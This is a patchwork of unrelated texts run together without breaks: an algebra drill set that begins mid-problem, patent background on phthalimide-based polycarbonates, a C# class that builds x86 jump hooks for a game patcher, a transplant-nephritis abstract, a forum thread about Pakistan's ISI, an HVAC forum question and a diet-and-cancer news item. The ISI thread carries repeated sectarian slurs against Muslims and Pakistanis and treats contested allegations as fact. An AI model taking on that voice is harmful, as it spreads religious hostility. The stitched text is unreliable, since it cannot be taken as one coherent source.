4333956)*(s + 7)/6 Suppose q**5 - 2429*q**4 + 498080*q**3 - 26728900*q**2 = 0. Calculate q. 0, 110, 2209 Solve g**3 - 16384*g**2 + 6611580*g = 0 for g. 0, 414, 15970 Factor -r**2 - 19219070*r - 92343162916225. -(r + 9609535)**2 Find m such that -m**3/2 + 6113833*m**2/2 - 4672364658608*m - 14017121488086 = 0. -3, 3056918 Factor 5*x**2 + 2218625*x + 15530130. 5*(x + 7)*(x + 443718) Find n such that 2*n**5/7 - 1198*n**4/7 + 2092*n**3/7 + 176152*n**2/7 + 47760*n = 0. -10, -2, 0, 14, 597 What is y in 2*y**5/13 + 9596*y**4/13 - 592364*y**3/13 + 2110048*y**2/13 + 464274*y + 3323556/13 = 0? -4859, -1, 6, 57 Determine x, given that 2*x**4/9 - 622*x**3/9 - 31648*x**2/3 - 372248*x/9 - 369728/9 = 0. -109, -2, 424 Let 4*y**5 - 1904*y**4 + 87476*y**3 - 963544*y**2 - 2577744*y + 3455712 = 0. What is y? -3, 1, 26, 426 Find z, given that -z**3/4 + 5472117*z**2/4 - 7486024323591*z/4 + 22458023721747/4 = 0. 3, 2736057 Factor -3*l**2 - 233115*l - 29789568. -3*(l + 128)*(l + 77577) Factor -4*v**2/3 - 976646728*v/3 - 59614926957069124/3. -4*(v + 122080841)**2/3 Solve 3*h**4/8 - 657*h**3 + 41631*h**2/8 + 196011*h/4 + 82404 = 0. -3, 14, 1744 Let 4*u**5/5 + 23576*u**4/5 + 1287256*u**3/5 + 15615536*u**2/5 - 56211164*u/5 + 39284792/5 = 0. What is u? -5839, -29, 1, 2 Solve -34*r**4/21 - 339986*r**3/21 + 1160326*r**2/21 - 220126*r/21 - 28580 = 0. -10003, -10/17, 1, 3 Let -9*p**4/4 - 859075*p**3/4 - 381803*p**2 + 95451*p = 0. What is p? -95451, -2, 0, 2/9 Solve 4*y**4 - 131301*y**3 - 42661803*y**2 + 53499581*y - 10706481 = 0. -323, 1/4, 1, 33147 Let 2*p**2/3 - 1324*p/3 - 410320/3 = 0. Calculate p. -230, 892 Factor -6655713*q**2/8 + 9*q/8. -3*q*(2218571*q - 3)/8 Let 261*y**4 - 66039*y**3 + 3937398*y**2 + 30785820*y - 709800 = 0. What is y? -7, 2/87, 130 Determine l, given that -2*l**4/9 - 1600*l**3 - 26134762*l**2/9 - 257312180*l/3 - 159938800 = 0. -3585, -28, -2 Factor 2*b**3/7 + 10634*b**2/7 - 384768*b/7 + 3468744/7. 2*(b - 18)**2*(b + 5353)/7 Factor 18*m**2/11 - 6124*m/11 + 76570/11. 2*(m - 13)*(9*m - 2945)/11 Solve -6*k**5/7 - 500*k**4 - 3570*k**3 + 204080*k**2/7 + 100896*k/7 - 276480/7 = 0. -576, -12, -4/3, 1, 5 Factor -2*u**2 + 508674*u + 14244440. -2*(u - 254365)*(u + 28) Suppose -3*t**4/7 + 114*t**3 + 14253*t**2/7 + 50940*t/7 = 0. Calculate t. -12, -5, 0, 283 Factor 383797500076875*c**2 + 475050450*c + 147. 3*(11310725*c + 7)**2 Factor -2*k**2 + 223906*k + 159754716. -2*(k - 112662)*(k + 709) Suppose -h**2 - 33688*h - 22994727 = 0. Calculate h. -32991, -697 Factor -q**3/4 - 15435*q**2/4 - 16298772*q - 10601710511. -(q + 791)*(q + 7322)**2/4 Factor 2*z**2/3 - 99446*z/3 - 497380. 2*(z - 49738)*(z + 15)/3 Factor 4*b**2 - 24584*b + 24985540. 4*(b - 4861)*(b - 1285) Factor 115992900*x**2 - 55939380*x + 6744409. (10770*x - 2597)**2 Factor -2*d**3 + 318541978*d**2 - 12683624127790048*d + 12683623809248072. -2*(d - 79635494)**2*(d - 1) Factor -7*m**3/2 - 3208899*m**2 - 916828*m. -m*(m + 916828)*(7*m + 2)/2 Find q such that 5*q**4/3 + 23745*q**3 + 782920*q**2/3 - 284720*q = 0. -14236, -12, 0, 1 Find f such that 2*f**5/9 + 670*f**4/3 + 48676*f**3 - 4138716*f**2 - 154059030*f - 1226530350 = 0. -531, -15, 87 Solve -4*h**3 + 68*h**2 + 6176*h - 99840 = 0. -39, 16, 40 Determine f so that 2*f**5 - 7952*f**4 + 71458*f**3 - 206332*f**2 + 190416*f = 0. 0, 2, 3, 4, 3967 Solve 6671889*c**2 - 4530582*c + 769129 = 0. 877/2583 Find o such that 2*o**3/9 + 4840*o**2/9 + 16974*o - 17512 = 0. -2388, -33, 1 Determine r so that 2*r**3/5 + 23418*r**2/5 - 680864*r/5 - 140856 = 0. -11738, -1, 30 Factor 3*l**2 + 1959648*l + 320018356992. 3*(l + 326608)**2 Solve 2*t**4/5 - 1306*t**3/5 - 502392*t**2/5 - 2966904*t/5 = 0. -267, -6, 0, 926 Find s such that -4*s**3 + 6232412*s**2 + 12464836*s + 6232420 = 0. -1, 1558105 Determine a so that -4*a**2/7 - 225396016*a - 22226471762544112 = 0. -197221514 Determine n so that 6*n**4 - 14517*n**3/7 - 19767*n**2/7 - 4167*n/7 + 1041/7 = 0. -1, -1/2, 1/7, 347 Factor 514*m**2/3 + 33314*m/3 - 75260. 2*(m + 71)*(257*m - 1590)/3 Factor -3*b**2 + 48033*b - 1151064. -3*(b - 15987)*(b - 24) Let n**2/4 - 1477327*n + 2182495064929 = 0. What is n? 2954654 Suppose -5*q**4 - 1130*q**3 - 32445*q**2 + 1374920*q - 1341340 = 0. Calculate q. -182, -67, 1, 22 Factor -x**2/7 + 2482416*x/7 + 7447257/7. -(x - 2482419)*(x + 3)/7 Suppose 4*m**5/3 - 8660*m**4/9 + 1014908*m**3/9 - 1673260*m**2/9 + 667000*m/9 = 0. Calculate m. 0, 2/3, 1, 145, 575 Find k such that -2*k**4/7 + 1410*k**3/7 - 5346*k**2/7 - 183410*k/7 - 25236 = 0. -9, -1, 14, 701 Determine r, given that r**4 - 549390*r**3 - 12087111*r**2 + 25822388*r - 13185888 = 0. -24, 1, 549412 Let -3*m**5 + 3752*m**4 - 390316*m**3 + 13628560*m**2 - 154577984*m + 97109760 = 0. Calculate m. 2/3, 22, 44, 1140 Factor -5*f**2 + 84330*f + 7885935. -5*(f - 16959)*(f + 93) Let -3*l**3/7 + 6795*l**2/7 - 799872*l/7 + 7322220/7 = 0. Calculate l. 10, 114, 2141 Factor -h**2/5 + 28248*h/5 - 479927/5. -(h - 28231)*(h - 17)/5 Find f such that -f**3/5 + 130029*f**2/5 + 1300665*f + 16259875 = 0. -25, 130079 Determine d so that -d**3/4 + 51695*d**2/4 - 662501375*d/4 - 144837335375/4 = 0. -215, 25955 Factor -i**4 - 3578*i**3 + 50275*i**2 - 46696*i. -i*(i - 13)*(i - 1)*(i + 3592) Determine u, given that u**3 + 24106306*u**2 - 48212615*u + 24106308 = 0. -24106308, 1 Find k such that -17096*k**3 + 355864*k**2 - 1818642*k - 347508 = 0. -394/2137, 21/2 Factor d**2/4 + 45403124*d + 2061443668959376. (d + 90806248)**2/4 Let -p**4/3 + 2206222*p**3/3 - 8824877*p**2/3 + 11031092*p/3 - 1470812 = 0. What is p? 1, 2, 2206218 Factor 3962*l**3 - 23770*l**2 - 63404*l - 32. 2*(l - 8)*(l + 2)*(1981*l + 1) Factor 2*g**2/3 - 420356*g/3 - 4624642. 2*(g - 210211)*(g + 33)/3 What is w in 3*w**4 + 1698*w**3 + 80868*w**2 - 359442*w - 438615 = 0? -513, -57, -1, 5 Determine c so that -c**3 - 3525*c**2 - 228983*c - 2383251 = 0. -3459, -53, -13 Factor 3*n**3 + 13632*n**2 + 16711680*n + 2727346176. 3*(n + 192)*(n + 2176)**2 Find c such that 3*c**5 - 6225*c**4 + 4043208*c**3 - 832921764*c**2 - 4250046336*c - 3413075136 = 0. -4, -1, 526, 1028 Suppose 4*w**3/3 + 47648*w**2 - 29632868*w + 13703804600/3 = 0. Calculate w. -36350, 307 Let -2*h**2/3 + 281696*h - 89556856/3 = 0. What is h? 106, 422438 Let -3*d**2 - 30259365*d + 60518742 = 0. What is d? -10086457, 2 Suppose 4*n**4 + 7060*n**3 + 496088*n**2 - 18430672*n + 1792
The present disclosure generally relates to resins and resin blends and articles comprising thermoplastic polymers derived from 2-hydrocarbyl-3,3-bis(4-hydroxyaryl)phthalimide monomers. Homopolycarbonate and Copolycarbonate resins derived from such monomers generally have a higher Tg and greater oxygen and water permeability than resins derived from the most widely available commercial polycarbonate, bisphenol A (“BPA”) polycarbonate homopolymers. As described herein, it is also possible to make such copolycarbonates with the transparency of polycarbonates and good color (i.e., low yellowness index) provided this monomer is made by a method that achieves sufficient purity. More particularly, the present disclosure relates to resin blends and articles comprising a polycarbonate comprising structural units derived from phenolphthalein derivatives, such as 2-hydrocarbyl-3,3-bis(4-hydroxyaryl)phthalimide monomer and an ABS (acrylonitrile-butadiene-styrene) resin. The present disclosure further relates to resins and resin blends and articles comprising a polycarbonate comprising structural units derived from relatively pure 2-hydrocarbyl-3,3-bis(4-hydroxyaryl)phthalimide. It would be desirable to develop a process for preparing relatively pure phenolphthalein derivatives such as 2-hydrocarbyl-3,3-bis(4-hydroxyaryl)phthalimide, which can then in turn be used for producing polycarbonates and other polymers having significant content of structural units derived from this monomer, which polymers also have good color, (e.g., a yellowness index of less than about 10), and reasonably high weight average molecular weight (e.g., at least about 15,000). Further still, there is a need for such resins and resin blends and articles having excellent fire retardance and improved physical properties.
using System; namespace UCP.Patching { /// <summary> /// Defines the replacement of an existing instruction with an assembly jmp instruction /// </summary> class BinHook : BinRedirect { /// <summary> /// Creates an assembly jmp instruction of length 5 bytes and fills remaining byte length with nops /// </summary> /// <param name="hookLen">Size in bytes of instruction(s) to be replaced with jmp instruction</param> public BinHook(int hookLen) : this(hookLen, null, 0xE9) { } public BinHook(string jmpBackLabel, params byte[] jmpBytes) : this(jmpBytes.Length + 4, jmpBackLabel, jmpBytes) { } public BinHook(int hookLen, string jmpBackLabel, params byte[] jmpBytes) : base(true) { if (hookLen < jmpBytes.Length + 4) throw new Exception("Hook length is too short!"); this.Collection.Insert(0, jmpBytes); int nopsLen = hookLen - (4 + jmpBytes.Length); if (nopsLen > 0) this.Collection.Add(new BinNops(nopsLen)); if (jmpBackLabel == null) { jmpBackLabel = this.GetHashCode().ToString() + "back"; this.Collection.Add(new BinLabel(jmpBackLabel)); } base.Add(new BinBytes(0xE9)); base.Add(new BinRefTo(jmpBackLabel)); } public override void Add(BinElement input) { // add in front of jmpBytes, refTo, nops EditData.Insert(EditData.Count - 3, input); } public static Change Change(string ident, ChangeType type, bool checkedDefault, int hookLen, params BinElement[] code) { return new Change(ident, type, checkedDefault) { new DefaultHeader(ident, true) { CreateEdit(ident, hookLen, code) } }; } public static BinaryEdit CreateEdit(string ident, int hookLen, params BinElement[] code) { var hook = new BinHook(hookLen, ident, new byte[1] { 0xE9 }); foreach (BinElement element in code) hook.Add(element); return new BinaryEdit(ident) { hook, new BinLabel(ident) }; } public static BinHook CreateJMP(int hookLen, params BinElement[] code) { var hook = new BinHook(hookLen, null, new byte[1] { 0xE9 }); foreach (BinElement element in code) hook.Add(element); return hook; } } }
[Acute cytomegalovirus glomerulonephritis in a renal transplant patient]. We report on an acute glomerulonephritis with renal failure in a living-related renal allograft recipient with a cytomegalovirus infection. The clinical presentation was typical of an acute nephritis. Renal biopsy showed lesions of diffuse endocapillary proliferative glomerulonephritis. The disease resolved spontaneously. The pathogenesis of cytomegalovirus glomerulopathy is briefly discussed.
Important Notice: Due to a corruption in the BR forum database we regret to announce that data records relating to some of our registered users have been lost. We estimate approx. 500 user details are deleted. To ease the process of recreating the user IDs we request members that have previously posted on the BR forums to recognise and identify their posts, once the posts are identified please contact the BRF moderator team by emailing BRF Mod Team with your post details. The mod team will be able to update your username, email etc. so that the user history can be maintained. Unfortunately for members that have never posted or have had all their posts deleted i.e. users that have 0 posts, we will be unable to recreate your account hence we request that you re-register again. We apologise for any inconvenience caused and thank you for your understanding. The Strategic Issues & International Relations Forum is a venue to discuss issues pertaining to India's security environment, her strategic outlook on global affairs and as well as the effect of international relations in the Indian Subcontinent. We request members to kindly stay within the mandate of this forum and keep their exchanges of views, on a civilised level, however vehemently any disagreement may be felt. All feedback regarding forum usage may be sent to the moderators using the Feedback Form or by clicking the Report Post Icon in any objectionable post for proper action. Please note that the views expressed by the Members and Moderators on these discussion boards are that of the individuals only and do not reflect the official policy or view of the Bharat-Rakshak.com Website. Copyright Violation is strictly prohibited and may result in revocation of your posting rights - please read the FAQ for full details. Users must also abide by the Forum Guidelines at all times. Says that the Government of the Islamic Republic “incentivizes scholars to watch what they write and say about Pakistan by holding visas and official meetings hostage”. Any idea who these incentivised scholars may be? David Ignatius? Stephen Cohen? Michael Kugelman? Ends her article with the taunt from Monty Python and the Holy Grail “I fart in your general direction. Your mother was a hamster and your father smelt of elderberries”. Member of the Nehru-Gandhi family led Congress Party, Shashi Tharoor ,on holding “uninterrupted and uninterruptible” talks with the Mohammadden Terrorist fomenting Islamic Republic of Pakistan: "We can't have uninterrupted talks with Pakistan as Mani Shankar Aiyar suggests. If the military and ISI unleash Lashkar-e-Taiba in Mumbai and other cities, we should interrupt talks. We can't talk to people who cannot control their nationals," …………………. "Its surrendering our self-respect by saying we will talk to you even if your people are coming and killing us," The US made secret preparations to evacuate its diplomats stationed in Pakistan to India on the night of the raid in May 2011 on the Abbottabad compound where Osama bin Laden was hiding, unnamed US officials have disclosed, while also suggesting that the then CIA station chief in Islamabad was poisoned by ISI in retaliation for the humiliating commando assault that killed the al-Qaida chief. The startling revelation, reported first in the Washington Post, centers on the months around the Abbottabad raid, Pakistanis twice breached protocol by outing the serving CIA station chief in Islamabad. It was partly out of anger at the US for implicating the ISI and its chief in the Mumbai terrorist attack. The situation was so bad that the first of those station chiefs, Jonathan Bank, was actually spirited out the country by the US in complete violation of diplomatic norms, fearing Pakistani retaliation. "As then-CIA deputy director Michael Morell finished a series of scheduled meetings in Islamabad, Bank escorted his boss to a waiting agency plane. Then, without any notice to Pakistani authorities and in violation of protocol, Bank stayed aboard as the flight crew closed the door," {wow !} the Post said, citing unnamed officials. Bank was replaced by Mark Kelton, a Russia expert who decided Pakistan could not be trusted and began preaching "Moscow Rules" upon arrival, meaning that the "ISI should be treated as a determined foe rather than a problematic partner.'' His seven month stint, the paper said, was in many ways a ''parade of humiliation for his hosts," from the Raymond Davis episode to the Abbottabad raid. He also signed off on many of the Drone attacks. The ISI disliked him so much that its chief Ahmad Shuja Pasha refused to meet him and referred to him as a cadaver. "On the first night in May , as midnight approached in Pakistan, Kelton, Munter and a senior US military official gathered in a secure CIA room in the embassy to watch transmissions from a stealth drone circling over Abbottabad as the bin Laden raid began," the Post reported. "The trio had made secret preparations for possible Pakistani reprisals, officials said, drafting evacuation plans that called for employees at scattered US diplomatic sites to flee across the border into India or be scooped up by the USS Carl Vinson from the Karachi shore." Soon after the raid, the Post said, Kelton began to experience severe stomach pains. It became so severe that he had to be evacuated after only seven months in his post even as the Pakistanis leaked his name in the media. Although Kelton recovered after he had abdominal surgery on this return to the U.S and is now retired from the CIA, "agency officials continue to think that it is plausible -if not provable -that Kelton's sudden illness was somehow orchestrated by the ISI," the paper wrote. To go with the above post, X Posting the Washington Post story that first disclosed that the notorious intelligence arm of the Punjabi dominated Military of the Islamic Republic of Pakistan, the Inter Services Intelligence Directorate aka ISID aka ISI was suspected to have poisoned the US Central Intelligence Agency’s (CIA) Islamabad Station Chief Mark Kelton: Ted Poe, U.S. Legislator who serves as Chairman of the Subcommittee on Terrorism, Non-Proliferation and Trade on the US rewarding their Mohammadden Terrorism fomenting Major Non NATO Ally the Islamic Republic of Pakistan: The House of Representatives recently gave Pakistan a $200 million raise. In all, it was a $900 million payday for a country that to this day is supporting terrorist groups that kill our service men and women in Afghanistan. It is well known by now that Pakistan gave safe harbor to Osama bin Laden. Before he met his maker in one of the greatest U.S. military raids ever conducted, bin Laden was living in a big house in a bustling military town in Pakistan. Less known is that after that raid our CIA station chief in Pakistan was poisoned: Both he and the CIA suspect he was poisoned by Pakistan's version of the CIA called the Inter-Services Intelligence Agency or "ISI." The ISI is infamous for its support for terrorists. In February 2012, a NATO report confirmed that it was supporting the Taliban and other terrorist groups with resources, sanctuary and training. A year before the NATO report, in 2011, Adm. Mike Mullen, then chairman of the Joint Chiefs of Staff, testified before Congress that "the Haqqani Network acts as a veritable arm of Pakistan's Inter-Services Intelligence Agency." No terrorist organization is responsible for more American deaths than the Haqqani Network. Excellent book, this sheds light on british needs/origin for ISI one of the points never discussed was that need for british to bring back /control india was one of the prime motives for it's creation : krishna_krishna wrote:Excellent book, this sheds light on british needs/origin for ISI one of the points never discussed was that need for british to bring back /control india was one of the prime motives for it's creation : Also the author had two passport so that he can go to Pak and also India during similar times Nothing should be surprising The role to hurt India and Hindu and Hindu social setup was known earlier with jihad during the British Raj In the modern times the British made this organization ISI to expand outside the military and inside the civil govt and use civil media and govt depts All means are used to undermine Indian and bring India down Pakistani national on trial for spying in favour of the Embassy of Pakistan in the UAE and divulging secret information about a local telecommunication company: Pakistani national, identified as A.A, stood trial in the court, accused of spying in favour of the Embassy of Pakistan in the UAE and divulging secret information about a local telecommunication company. The defence lawyer told the court that his client did not mean to divulge confidential information about the company he was working for. "He was just exchanging information with some employees of the Pakistan embassy, who were intelligence officers of the Pakistani Embassy to the UAE……………………. The US launches a “criminal theft and cyber security investigation” targetting the Awan family who have roots in the Islamic Terrorist Fomenting Islamic Republic of Pakistan and administered computers for US legislators mainly from the Democratic Party who served on the US intelligence, homeland security, and foreign affairs committees. The US during their cyber security investigation would be well addvised to see if information was passed on to the Islamic Republic’s notorious intelligence agency the Inter Services Intelligence Directorat aka ISID aka ISI : Dozens of House Democrats have collectively paid $4 million since 2009 to Pakistani IT professionals now under criminal investigation who had access to House members' email and computer files. Capitol Police is investigating whether five members of the Awan family from Pakistan engaged in criminal activity, including theft, as computer administrators for dozens of House Democrats, some of whom serve on the intelligence, homeland security, and foreign affairs committees. ………………….. The suspects–brothers Imran, Abid, and Jamal, and two of their wives, Hina Alvi and Natalia Sova–had full access to the lawmakers' email and computer files for whom they worked and are part of a criminal theft and cyber security investigation. The House members who paid the most to the Awans included Democratic Reps. Marcia Fudge (Ohio), Tim Ryan (Ohio), Jim Acosta (Calif.), and former Democratic National Committee chair Debbie Wasserman Schultz (Fla.). Awan family members received outsized salaries in comparison to their colleagues working on Capitol Hill, raking in $5 million collectively since 2003. Imran Awan, for example, received $1.2 million in salary since 2010, while legislative assistants on Capitol Hill receive a median annual salary of $43,000. ……………………… Two Sufi Mohammadden sect clerics who had travelled from India to the Mohammadden Terrorist fomenting Islamic Republic disappear. Suspicion is that the two Sufi Mohammadden Clerics have been picked up by the Intelligence Arm of the Uniformed Jihadi’s of the Islamic Republic of pakistan’s Army, the Inter Services Intelligence Directorate aka ISID aka ISI. Is it halal for an Islamic Republic like Pakistan to detain Mohammadden Clerics from Non-Mohammadden countries? Organisation of Islamic Co-operation must demand own member Pakistan stop molesting Ulema.: India has asked the Pakistan government to return two senior Indian clerics who have been missing from Lahore since Wednesday. Asif Nizami and his brother Nazim Nizami, senior clerics from Hazrat Nizamuddin Auliya dargah in New Delhi were travelling in Pakistan on a religious tour, but are believed to have gone missing from Lahore. The Indian high commissioner in Islamabad has lodged a strong complaint with the foreign ministry in Islamabad on Thursday evening. But sources here suspect the ISI, Pakistan's all-pervasive deep state, may have "picked them up" for reasons that are still unclear. The abduction of the Sufi clerics will be taken very seriously by India, sources said. Syed Asif Ali Nizami, one of the two Sufi clerics who went missing in Pakistan last week, rejected media reports that he and his nephew had been detained by Pakistani authorities on spying charges ..the cleric narrated a curious tale of being blindfolded and taken to an unknown location, where he was greeted with a degree of hospitality. I was taken to a place quite far from Karachi, with my face covered. I was offered food, they prepared tea and biscuits for me He also denied being mistreated by the Pakistani authorities, insisting that "no force or coercion was used" against them. We were not troubled, and were kept in VIP rooms The reports that we could not be contacted because of network issues is totally false, The two clerics thanked the governments of India and Pakistan for their safe return the clerics expressed their desire to visit the country again. I will definitely go to Pakistan again, bearing a message for peace and love The duo went missing from Lahore airport So, a senile, octogenarian is blind-folded, taken away from L'whore airport to an unknown location near/in k'rachi, housed in a VIP room, given chai-biskoot and asked about his dargah matters. Boy, do I have a bridge to sell you. 1. Blindfolded in lawhore and taken to k'rachi...by what? a plane, train or an automobile? How did he know he was not taken to the rural parts if he was blind folded?2. Cellphone did not work in l'whore or k'rachi or anywhere in between? 3. While the face was covered, he was treated to chai and biskoot4. Bakis did not mistreat him...no sireee bob! 5. All the baki "authorities" did was to ask him questions on his dargah which they could have asked him in l'whore hawaii adda6. As that unibrow idiot baki kirketeer said after learning about his new born, "thankj to the boyj", this cleric thanks al bakistan and its agencies for his "release"7. After all this, he wants to go back to the land of his masters...er kidnappers. I believe this was a simple meeting between a handler or a bagman and his asset. It got out of hand when the cleric's families raised a stink of him being incommunicado. Some is definitely black in the lentils.Next time an ingrate soofi goes missing in bakistan, let him rot. Presumably what you posted came from Times of India in which case, for the sake of good order, the web link follows. Check out the embedded video as well: Meanwhile BJP politician Subramanian Swamy is reported as indicating that the pair of Sufi Mohammadden Clerics who went “missing” in the Mohammadden Terrorism fomenting Islamic Republic of Pakistan “were working against the country {ie: India}”. Once again check out the embedded video: Hmmm………… I wonder if India has arrested a high ranking ISI aka ISID aka Inter Services Intelligence Directorate Agent committing espionage in India and the Mohammadden Terrorist fomenting Islamic Republic of Pakistan is consequently attempting to play victim by claiming that the high ranking agent was kidnapped and taken across the border into India. Let me hope that it is indeed the case that India has bagged a high ranking ISID agent for espionage in India and who after a full and public confession of spying can be traded for our retired naval officer Kulbhushan Jadhav who was kidnapped by Pakistan from Chabahar in Iran. Read about the affair of the disapperance of a Uniformed Jihadi by name of Lt.Col. (Retired?) Muhammad Habib Zahir: Dr. Gunter Mulack, the former German Ambassador to the Mohammadden Terrorist Fomenting Islamic Republic of Pakistan, who had first said in a seminar that he had heard Commander Kilbhushan Jadhav who was then working in Chabahar in Iran had been abducted by the Taliban from along the Iran-Pakistan border and then sold to the nototious intelligence arm of the Uniformed Jihadi’s of the Punjabi dominated Military of the Islamic Republic of Pakistan the Inter Services Intelligence Directorate aka ISI aka ISID; reiterates that claim. Dr. Mulack tells India Today "I had said during the course of a seminar in Karachi that it was heard Jadhav was abducted by the Taliban in Iran and then sold to Pakistan's ISI. It is not uncommon for this to happen in the border areas. But this was what locals told me. It was not what German intelligence had picked up": Afghanistan has gone a step beyond blaming the Mohammadden Terrorism Fomenting Islamic Republic of Pakistan located Haqqani Group for the Ramadan aka Ramzan month Green on Green Intra-Mohammadden suicide VBIED bombing in Kabul that killed 90. Afghanistan is now also blaming the the notorious Mohammadden Terrorism Fomenting Intelligence arm of the Uniformed Jihadi’s of the Punjabi Dominated Army of the Mohammadden Terrorism Fomenting Islamic Republic of Pakistan, the Inter Services Intelligence Directorate aka ISID aka ISI for the Ramadan aka Ramzan month Kabul suicide VBIED bombing that killed 90. Is it “Halal” for a self proclaimed IEDological Musim State, Islamic Republic and Sole Islamic Nuclear Power like the Mohammadden Terrorism Fomenting Islamic Republic of Pakistan to foment terrorism targetting Momins in a “Brotherly” country during the month of Ramadan aka Ramzan? : ……………. The Afghan intelligence service, NDS, said early findings showed the Afghan Haqqani militant network with the assistance of the Pakistani intelligence service, ISI, carried out the attack. In a statement, the NDS said: "These terrorists once again proved they don't represent any religion and they only carry out such coward attacks to please their Pakistani masters which is against all Islamic and human rights principals." ………………. C Christine Fair highlights the very close links between the Uniformed Jihadi’s of the Punjabi dominated Military of the Mohammadden Terrorism Fomenting Islamic Republic of Pakistan and the Un-Uniformed Jihadis of UN proscribed Islamic Republic of Pakistan based Mohammadden Terrorist group Jamaat Ud Dawa JuD. ………………. studies exhibit little awareness of the important domestic perquisites JuD affords its handlers in the army and the brutal intelligence agency that the army oversees, the Inter-services Intelligence Directorate (ISI). a In the last decade, JuD spawned numerous related organizations, such as the Idara Khidmat-e-Khalq (IKK, Organization for Humanitarian Assistance), declared by the US Department of Treasury to be an FTO in April 2006.10 In 2009, JuD constituted a new humanitarian front, Falah Insaniat Foundation (FIF, Foundation for Welfare of Humanity), which the United States also designated as an FTO in 2010. In 2012, the United Nations designated FIF pursuant to UN Security Council Resolutions 1267 (1999) and 1989 (2011).11 Most recently, in early August 2017, JuD has floated a political party named the Milli Muslim League (MML) headed by a senior leader of the JuD named Saifullah Khalid.12 The MML is fielding a candidate in the September 17, 2017 by-election to fill the seat left vacant by Nawaz Sharif’s recent ouster even though the MML has not yet completed its registration with the Pakistan Election Commission.13 The MML plans to field more candidates in the 2018 elections. This represents a serious retrenchment from the organization’s long-standing position that it has no role in electoral politics and that elections and democracy are in fact anathema to its interpretation of shariat. While little is known about the MML given its recency, speculation is rife about its relationship to Pakistan’s deep state. Some analysts interpret the development of MML as a positive sign that Pakistan is trying to rein in its proxy by giving it a nonlethal domestic role that will allow the state to decommission its jihad function gradually.14 I reject this interpretation. As I have previously argued and also note here, LeT is the only militant organization in Pakistan that argues explicitly against violence within Pakistan while also offering the perquisite of loyally executing lethal attacks at the behest of the deep state.15 While only time will tell which interpretation is correct, I see the emergence of the MML as a further effort by the deep state to formally embed JuD within Pakistani politics. The timing of the MML’s nascence is also notable because it coincides with the army’s exhaustion with both of the mainstream political parties (the Pakistan Peoples’ League and the Pakistan Muslim League of Nawaz Sharif) and the ongoing failure of Imran Khan’s Pakistan Tehreek-e-Insaf (PTI) to develop a national presence. In effect, the army has few options to engineer Pakistan’s political leadership in the forthcoming general elections.16 While the MML is unlikely to fare well in elections (as no religious party ever polls more than 10 percent in a free and fair Pakistan election),17 the MML can play a useful role as a member of a coalition groomed by the army and the ISI. Conclusions and Implications JuD remains the subject of scholarly and policy analytical inquiry. Most extant scholarship views this organization from the singular point of view of its external utility as a loyal and effective proxy of Pakistan’s military and intelligence agency. This singular focus upon its role in waging so-called jihad in India and, to a lesser extent, in Afghanistan significantly understates the significance of JuD to Pakistan’s deep state. Not only is it a crucial partner in prosecuting its national security interests abroad, it is also a vital partner in managing Pakistan’s internal security arrangements. JuD is the only militant organization in Pakistan that deliberately preaches the message that the only legitimate jihad is the external jihad. It is also the only militant organization that explicitly disavows not only sectarian violence, but also communal violence. This does not mean that JuD is insouciant about deviations from tawheed or other shortcomings. However, it believes that within the borders of Pakistan, the only method to deal with wayward Muslims—either ordinary citizens or in leadership—is through dawah and preaching the message of the external jihad. With the launch of the MML, JuD will be even more effective in spreading this message. Consequently, JuD will likely become even more valuable to its masters in the Pakistani army and intelligence community, even if it comes at the cost of being more difficult to control and manage over the longer term. A case of “Good Terrorists” being plausibly deniably backed with COTS explosives by the Inter Services Intelligence Directorate aka ISID aka ISI, the notorious intelligence arm of the Uniformed Jihadi’s of the Military of the Mohammadden Terrorism Fomenting Islamic Republic of Pakistan. Afghanistan’s Tolo News reports that Afghan intelligence agency, the National Directorate of Security (NDS), have announced that initial investigations show that the explosives used by Mohammadden belief motivated group, Taliban, in the attack on the Intercontinental Hotel in Kabul on Saturday unsurprisingly came from the Mohammadden Terrorism Fomenting Islamic Republic of Pakistan: Explosives Used in Hotel Attack Traced Back To Pakistan: NDS National Directorate of Security (NDS) on Tuesday announced that initial investigations show that the explosives used by Taliban insurgents in the attack on the Intercontinental Hotel in Kabul on Saturday came from Pakistan. The NDS also recovered the vehicle that attackers used to enter the hotel compound. “The explosive materials seized in the vehicle shows that the material is made in Pakistan,” said the NDS in a press release. According to the NDS statement, the explosive chemical used by the insurgents was produced by a company in Islamabad called Biafo Industries Limited. According to Biafo’s website, the company is a modern state of the art explosive manufacturing company. It states it is highly automated and can produce more than 2,500 metric tons of explosives per shift annually. Saturday’s deadly attack left at least 43 people dead and many more wounded. However, government has only confirmed the death of 29 people so far. Don’t take any action against Hafiz Saeed, Lahore High Court tells Pakistan govt The Lahore High Court on Wednesday restrained the Pakistan government from arresting JuD chief and 26/11 terror attack mastermind, Hafiz Saeed, a day after he moved the court seeking protection from arrest. Justice Amin Aminuddin Khan, who heard Saeed’s plea, directed the government from taking any “adverse action” against him.
Welcome to HVAC-Talk.com, a non-DIY site and the ultimate Source for HVAC Information & Knowledge Sharing for the industry professional! Here you can join over 150,000 HVAC Professionals & enthusiasts from around the world discussing all things related to HVAC/R. You are currently viewing as a NON-REGISTERED guest which gives you limited access to view discussions To gain full access to our forums you must register; for a free account. As a registered Guest you will be able to: Participate in over 40 different forums and search/browse from nearly 3 million posts. Imperial Salamander Just hooked up a brand new Imp. salamander for one of my accounts. It was factory converted to LP gas. Unit fires fine and customer is very happy with it. Only issue is the pilot lights. They have a tendency to blow out. There has to be an adjustment for them, but I'm having trouble locating the adjustment. As it's already in place on a shelf above the range and is a pain to get to, where are the adjustments located. Owner's manual shows nothing. One way to outthink people is to make them think you think. They'll think you're not really thinking what you're trying to get them to think you think........... Imperial calls em a "crossfire Broiler". The restaurant guys call em Salamanders. They use it to cook oysters in the shell, and when they are cooked they pop open. They are delicious. We just build a fire down on the beach and sit em on a log by the fire and open them that way. You can also steam em or if you really wanna stink the house up, do em in the oven broiler. One way to outthink people is to make them think you think. They'll think you're not really thinking what you're trying to get them to think you think...........
Put that sandwich down, now. As if the link between carbohydrates and the muffin-top spilling over your waistband wasn't bad enough, new research indicates that a high-carbohydrate diet may also influence your cancer risk and the growth of tumours. Scientists at Canada's British Columbia Cancer Research Centre found that mice fed on a high-protein, low-carbohydrate diet had slower tumour cell growth than those fed a typical Western diet high in carbohydrates. While the experiments were conducted with mice, the findings appear to be strong enough to be applied to humans. High-carb diet ... delicious but deadly? "On the Western diet, half of the mice had tumours by middle age. On the low-carb diet, none of the mice had the tumours," said Dr Gerry Krystal, who authored the study along with colleague Dr Vincent Ho. The mice used were predisposed to breast cancer, and had a life expectancy of two years.
